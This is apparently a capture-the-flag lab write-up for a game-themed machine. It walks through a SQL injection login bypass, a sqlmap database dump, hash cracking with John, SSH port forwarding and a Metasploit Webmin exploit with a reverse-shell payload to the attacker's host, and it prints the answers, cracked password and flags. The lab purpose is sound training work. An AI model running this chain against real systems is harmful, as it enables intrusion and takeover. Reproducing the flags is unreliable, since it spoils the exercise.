1. What is the name of the large cartoon avatar holding a sniper on the forum? - Agent 47

We can login using SQLi

Username: ' or 1=1 -- -

We can leave the password field blank and login.

1. When you've logged in, what page do you get redirected to? - portal.php

sqlmap -r portalreq.txt --dbms=mysql --dump
#uses intercepted request to dump database

As given, we have to use Burp Suite to capture the POST request in portal.php, and save the request to a file.

Then, we have to pass this file into SQLMap

1. In the users table, what is the hashed password? - ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

2. What was the username associated with the hashed password? - agent47

3. What was the other table name? - post

john --format=Raw-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt gamehash.txt
#cracks the hash found in previous step

#we can try ssh login using this password
ssh agent47@10.10.139.234

cat user.txt

1. What is the de-hashed password? - videogamer124

2. What is the user flag? - 649ac17b1480ac13ef1e4fa579dac95c

#view socket connections in remote machine
ss -tulpn

#in host machine
ssh -L 10000:localhost:10000 agent47@10.10.139.234

#now we can go to localhost:10000 for remote access to webserver

1. How many TCP sockets are running? - 5

2. What is the name of the exposed CMS? - Webmin

3. What is the CMS version? - 1.580

msfconsole

search 1.580
#we can also search for webmin

use exploit/unix/webapp/webmin_show_cgi_exec

show options

set PASSWORD videogamer124

set RHOSTS 127.0.0.1
#since we are accessing webmin on localhost

set USERNAME agent47

set PAYLOAD cmd/unix/reverse

set LHOST 10.17.48.136

set SSL false

run
#gives root access

cd /root

cat root.txt

1. What is the root flag? - a4b945830144bdd71908d12d902adeee